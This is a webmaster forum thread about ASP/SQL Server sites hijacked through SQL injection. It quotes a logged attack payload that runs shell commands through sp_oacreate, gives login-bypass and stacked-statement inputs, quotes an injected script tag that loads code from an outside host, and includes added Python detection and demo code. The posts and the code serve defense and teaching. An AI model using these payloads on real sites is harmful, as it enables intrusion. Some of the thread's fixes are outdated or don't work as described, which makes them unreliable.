Webmaster Forums - Webmaster forum for HTML, PHP, ASP, CSS and more

Old 12-16-2006, 09:19 AM   #21 (permalink)
fred
Junior Member
 
Join Date: Nov 2006
Posts: 3
Default Re: Page being hijacked!

Here are the solutions:

To immediately and temporarily stop the problem, block the following IP addresses using a reliable router. I used a “Cisco 506e”.

If you are using an ISP, you may be able to persuade them by explaining your problem to them.

The IP addresses are:
58.37.0.0 - 58.37.255.255
These IPs belong to Shanghai Telecom.

Please make sure by examining your log files. I had the following script in my log files. Especially look for the external IP address and block those IPs.


2006-11-12 01:51:06 W3SVC1 WEBSTERS-OLD 192.168.1.110 GET /sicresults.asp siccode=2655';CREATE%20TABLE%20[X_4223](ResultTxt%20nvarchar(1024)%20NULL);use%20master%2 0declare%20@o%20int%20exec%20sp_oacreate%20'wscrip t.shell',@o%20out%20exec%20sp_oamethod%20@o,'run', NULL,'cmd%20/c%20dir%20C:\Inetpub\wwwroot\Javascripts\search.js %20>%204223.tmp',0,true;DROP%20PROCEDURE%20sp_OACr eate--|93|80040e57|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]String_or_binary_data_would_be_truncated. 80 - 58.37.160.184 HTTP/1.1


This person uses port 80 to attack your website, and obviously you cannot block this port. He sends a backdoor Trojan virus and uses the weakness in your ASP script to obtain entry to your SQL server and execute a script. In my case the script was as above, copied and pasted from our log files.

Permanent solution:

1. Make a new server without ever exposing it to the Internet, provided you are using your own server. I used jump/flash drives to download patches, scripts and the database (2GB). Run a virus scan on all computers involved and kill the backdoor agent. I used AVG spyware, as this program was effective in killing the virus. Make sure to delete all .tmp files before you copy to your new server. Make sure you follow step #3. That alone will solve the problem.
2. As soon as you have installed the operating system, please install antivirus, preferably from AVG, and a software firewall. The most effective firewall program is BLACKICE, as this program disallows / blocks any script more than 200 characters. You can find this program at BLACKICE PC Protection Firewall Software


3. You should be able to solve this problem even if you use an ISP as below:

SQL Injection
The script uses a vulnerability in your own program. This means you have to secure all vulnerabilities and ASP scripts.

SQL Injection is what has happened above. What to do is to look in your scripts for these vulnerabilities. These are not limited to ASP files, they are readily available in PHP, and almost any Server Side script, and any server.

Here’s an example. Let’s say this is your SQL query:

"SELECT * FROM table_name WHERE username='".$user."' AND pass='".$pass."'"

That looks all and good, but the problem is, let’s say the user enters in with this information:
$user = "username";
$pass = "' OR ''='";
This will allow the user to log on with any password. If you were smart, you could check for the number of rows returned, and make sure there is only 1 row returned. However, this is simply a workaround. In PHP, you would use the function mysql_real_escape_string(). This escapes all single quotes. So $pass would look like this:

$pass = "\' OR \'\'=\'";

And their SQL Injection attack would be stopped. However, there are other ways. Such as this:
"SELECT * FROM table_name WHERE username='".$user."' AND id=".$id.";"

This way the attacker could enter in something like this:
$id = '1; CREATE TABLE whatever ( .. );';

This wouldn’t work in MySQL, because it only supports one statement per db query. However, it can be done with ASP and other db systems, like SQL Server.

This function is the best resolution:

function quote_smart($value)
{
    // Stripslashes
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    // Quote if not a number or a numeric string
    if (!is_numeric($value)) {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    return $value;
}

This way, you’d enter it in like this:

"SELECT * FROM users WHERE username = ".quote_smart($username)." AND pass = ".quote_smart($pass).";"

This way, the quote_smart function allows for smart quoting, which removes the need for you to manually quote your own variables with single quotes. It determines whether the variable is a number or not, and escapes and quotes it specifically. This will not work for the multiple SQL statements injection, so you can add an else section:

    else {
        $value = mysql_real_escape_string($value);
    }

This is the cause of the problem, and if you do not understand this, ask whoever coded your website. If you use ASP, here’s a good article on SQL injection:

ASP: 4GuysFromRolla.com - Protecting Yourself from SQL Injection Attacks
PHP mysql_real_escape_string: PHP: mysql_real_escape_string - Manual

Those should help you stop this attack. You will need to change all of your scripts in question.

This will definitely solve this problem.

Please leave a thank you note for me!
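For the log review described in the post above, here is an added example (not part of the original post) that scans IIS log lines for the tokens visible in the quoted request and groups the hits by client IP. The column order is assumed from the quoted line, and the sample lines, addresses and function names are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Column order assumed from the log line quoted in the post (no #Fields header shown).
FIELDS = ["date", "time", "sitename", "computer", "s_ip", "method",
          "uri_stem", "uri_query", "s_port", "username", "c_ip", "version"]

# Signatures built only from tokens visible in the quoted request.
SIGNATURES = [
    ("stacked-statement", re.compile(r";\s*(create|drop|declare|exec|use)\b")),
    ("ole-automation-proc", re.compile(r"\bsp_oa(create|method)\b")),
    ("wscript.shell", re.compile(r"wscript\.shell")),
]

def parse_line(line):
    """Split one log line into named fields; None for header or short lines.
    The query is whatever lies between the 7 leading and 4 trailing columns,
    so stray spaces inside it cannot shift the client IP column."""
    head = line.split(None, 7)
    if line.startswith("#") or len(head) < 8:
        return None
    tail = head[7].rsplit(None, 4)
    if len(tail) < 5:
        return None
    return dict(zip(FIELDS, head[:7] + tail))

def suspicious(query):
    """Names of the signatures that match the URL-decoded, lower-cased query."""
    decoded = unquote_plus(query).lower()
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan(lines):
    """Map client IP -> Counter of signature hits, for requests matching any."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        names = suspicious(rec["uri_query"]) if rec else []
        if names:
            hits.setdefault(rec["c_ip"], Counter()).update(names)
    return hits

# Constructed sample lines (documentation IP ranges, shortened request).
SAMPLE = [
    "#Software: Microsoft Internet Information Services 6.0",
    "2006-11-12 01:50:58 W3SVC1 WEB01 192.0.2.10 GET /sicresults.asp siccode=2655 80 - 198.51.100.7 HTTP/1.1",
    "2006-11-12 01:51:06 W3SVC1 WEB01 192.0.2.10 GET /sicresults.asp siccode=2655';CREATE%20TABLE%20[X_1](t%20nvarchar(64));exec%20sp_oacreate%20'wscript.shell'--|93|80040e57|String_or_binary_data_would_be_truncated. 80 - 203.0.113.184 HTTP/1.1",
    "2006-11-12 01:51:09 W3SVC1 WEB01 192.0.2.10 GET /search.asp q=create+table+tutorial;+part+2 80 - 198.51.100.7 HTTP/1.1",
]

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE).items():
        print(ip, dict(counts))
```
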
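The two queries from the post above, run with the inputs it quotes, beside the same queries written with bound parameters. This is an added example, not part of the original post: it uses Python's sqlite3 with an in-memory database as a stand-in for PHP/MySQL or ASP/SQL Server, and the table contents, column list and function names are constructed.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site database (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'username', 'correct-horse')")
    return db

def login_concat(db, user, pw):
    """The post's first query: input pasted between quotes in the SQL text."""
    sql = ("SELECT * FROM users WHERE username='" + user +
           "' AND pass='" + pw + "'")
    return db.execute(sql).fetchall()

def login_param(db, user, pw):
    """Same lookup with placeholders; values travel separately from the SQL."""
    sql = "SELECT * FROM users WHERE username = ? AND pass = ?"
    return db.execute(sql, (user, pw)).fetchall()

def lookup_concat(db, user_id):
    """The post's second query (unquoted id). executescript() accepts several
    statements per call, standing in for a driver that allows stacking."""
    db.executescript("SELECT * FROM users WHERE id=" + user_id + ";")

def lookup_param(db, user_id):
    """Bound parameter: the whole input is compared to id as a single value."""
    return db.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

def table_exists(db, name):
    sql = "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?"
    return db.execute(sql, (name,)).fetchone() is not None

BYPASS = "' OR ''='"                              # password input from the post
STACKED = "1; CREATE TABLE whatever (x INTEGER)"  # post's id input, column list constructed

if __name__ == "__main__":
    db = make_db()
    print("concat login rows:", len(login_concat(db, "username", BYPASS)))
    print("param login rows: ", len(login_param(db, "username", BYPASS)))
    print("param lookup rows:", len(lookup_param(db, STACKED)),
          "table created:", table_exists(db, "whatever"))
    lookup_concat(db, STACKED)
    print("after concat lookup, table created:", table_exists(db, "whatever"))
```
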
Old 02-16-2007, 06:27 PM   #22 (permalink)
visio
Junior Member
 
Join Date: Aug 2006
Posts: 33
Default Re: Page being hijacked!

I take everything back about Fred.

Thanks Fred, that is very nice, I've just read your last post and I'm impressed.

I tried to give you some points, but apparently I can't.

Thanks again.

Paul
Old 04-23-2007, 03:36 PM   #23 (permalink)
rely
Junior Member
 
Join Date: Apr 2007
Posts: 1
Default Re: Page being hijacked!

Hi Everyone,

I had this same problem and fredthetiger@hotmail.com sent me a bunch of great information off the post. If you are still having problems try emailing him and see if that helps you.

Thanks,
Rachel
Old 09-29-2007, 07:33 PM   #24 (permalink)
stealthiss
Junior Member
 
Join Date: Sep 2007
Posts: 24
Default Re: Page being hijacked!

One of our customers had the same, but that happened to be a worm on the local machine. He was using shared hosting. He had to change the hosting company because it appears to be a new worm that keeps reactivating itself every so often, and no one knows in advance what the next attack will look like.
__________________
Hosting for $0.99 - www.stealth-iss.org
Cheapest servers - www.DedicatedServerStore.com
Old 11-04-2007, 01:27 PM   #25 (permalink)
mostlysunny
Junior Member
 
Join Date: Nov 2007
Posts: 1
Default Re: Page being hijacked!

Reviving this very interesting thread. First of all, thanks for the wealth of info available; it gives some comfort after a vicious attack!

Looking at the SQL table list and then analyzing the IIS logs, I noticed some Chinese dudes added the infamous D99_tmp on 20071102, and then the next day some fields in my database were filled by <script src="hXXtp://yl18.net/0.js"></script> (http removed). The problem is I can't find any trace of that script in the IIS logs, so I'm confused as to how it got there. Any thoughts?
Old 02-06-2008, 03:54 PM   #26 (permalink)
casty23
Junior Member
 
Join Date: Feb 2008
Posts: 2
Default Re: Page being hijacked!

Quote:
Originally Posted by O~Snapple
I bet you have I Power Web. I had the same problem with them and I recently switched hosting companies. The worst is when I called to tell them, they said, "Well, it sounds like someone hacked your page." I said, "You freaking idiot, they hacked your server!"

~Snapple

LOL. Now I know why their hosting is so cheap.
Old 01-09-2009, 09:08 AM   #27 (permalink)
jv17
Member
 
Join Date: Nov 2008
Posts: 292
Default Re: Page being hijacked!

that's weird though
__________________
SEO
Old 01-28-2009, 01:24 PM   #28 (permalink)
Shaman
Member
 
Join Date: Jan 2009
Posts: 261
Default Re: Page being hijacked!

Install Norton or Nod 32 on your machine.
All times are GMT -4. The time now is 06:11 PM.

